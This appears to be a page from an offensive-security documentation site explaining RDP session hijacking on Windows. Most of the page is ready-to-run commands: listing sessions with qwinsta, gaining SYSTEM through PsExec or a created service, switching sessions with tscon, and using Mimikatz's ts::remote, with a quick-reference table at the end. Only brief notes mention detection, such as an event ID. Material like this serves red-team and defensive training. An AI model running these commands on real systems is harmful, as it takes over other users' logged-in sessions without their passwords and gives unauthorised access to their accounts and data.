> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# RDP Hijacking

> RDP session hijacking: take over active RDP sessions without password using tscon as SYSTEM.

## Overview

As SYSTEM, hijack active or disconnected RDP sessions without knowing the user's password. Uses `tscon` to switch sessions.

***

## List Sessions

```cmd theme={"dark"}
query user
qwinsta
```

Output shows session IDs and state (Active/Disc).

***

## Hijack — From SYSTEM

### Get SYSTEM First

```cmd theme={"dark"}
PsExec.exe -s cmd.exe
```

Or via service:

```cmd theme={"dark"}
sc create sesshijack binpath= "cmd.exe /k tscon TARGET_SESSION_ID /dest:rdp-tcp#CURRENT_SESSION"
sc start sesshijack
```

### Switch Session

```cmd theme={"dark"}
tscon TARGET_SESSION_ID /dest:rdp-tcp#YOUR_SESSION_ID
```

### Example

```cmd theme={"dark"}
# You are in session 2, want to hijack session 1
tscon 1 /dest:rdp-tcp#2
```

***

## Via Service (No Interactive SYSTEM)

```cmd theme={"dark"}
sc create hijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#2"
net start hijack
```

***

## Mimikatz Method

```cmd theme={"dark"}
mimikatz # ts::sessions          # List sessions
mimikatz # token::elevate        # Get SYSTEM
mimikatz # ts::remote /id:1      # Hijack session 1
```

***

## Notes

* Requires SYSTEM privileges
* Works on disconnected sessions too
* No password needed for target session
* The original user **is** disconnected — `tscon` reattaches their session to the attacker's terminal, dropping their live connection (Event ID 4779). Their running programs persist, but they lose the active session.
* Server 2019+ may require additional steps

***

## Quick Reference

| Task          | Command                                        |
| ------------- | ---------------------------------------------- |
| List sessions | `query user` or `qwinsta`                      |
| Hijack        | `tscon SESSION_ID /dest:rdp-tcp#YOUR_SESSION`  |
| Via service   | `sc create hijack binpath= "cmd /k tscon ..."` |
| Mimikatz      | `ts::remote /id:SESSION_ID`                    |
